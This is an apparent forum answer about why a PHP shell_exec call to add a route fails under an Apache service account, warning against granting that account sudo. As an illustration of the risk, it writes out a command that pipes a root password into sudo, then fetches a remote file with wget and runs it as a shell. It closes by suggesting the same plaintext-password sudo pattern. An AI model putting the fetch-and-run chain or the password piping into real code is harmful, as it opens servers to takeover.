So depending on what HTTP server you are using (nginx, apache, etc) if properly configured these service accounts should not be able to execute that command because they do not have root level privileges in order to execute the changes you are wanting to make even if shell_exec is enabled.

You can test this by logging in as root, and if running apache, run the following commands:

su - apache (or whatever user apache is running as)

This should return.

This account is currently not available.

Since the apache user should be configured with nologin this, in theory, shouldnt work. However you can add a user to test this behavior with via 'useradd'.

That being said.. on my virtual machine I recreated this for context. I created a test user and attempted to run the command you listed. Here is the output (which is also what the apache user should get)

[timgalyean@test ~]$ route add 50.50.50.50 gw 127.0.0.1 lo
SIOCADDRT: Operation not permitted
[timgalyean@test ~]$

So as you can see the user does not have permission to do this. Contrary to the task at hand this is a good thing.

Also, I would personally advise against going this route as shell_exec can lead to other security problems.. specially if you give your user permissions to execute this.

Another thing I noticed is that you have sudo in your command. The service user should not have sudo access either. If I was able to figure out what your php script was doing I could craft something nifty such as..

 shell_exec("echo 'rootpass' | sudo -u root -S route add 50.50.50.50 gw 127.0.0.1 lo ; wget url/myfile.txt; bash -c 'myfile.txt'"); 

Assuming myfile.txt was a shell I could then compromise your server via your service user which in order to get this working would require sudo access.

try:

$output = shell_exec("echo 'rootpass' | sudo -u root -S route add 50.50.50.50 gw 127.0.0.1 lo");
echo "<pre>$output</pre>";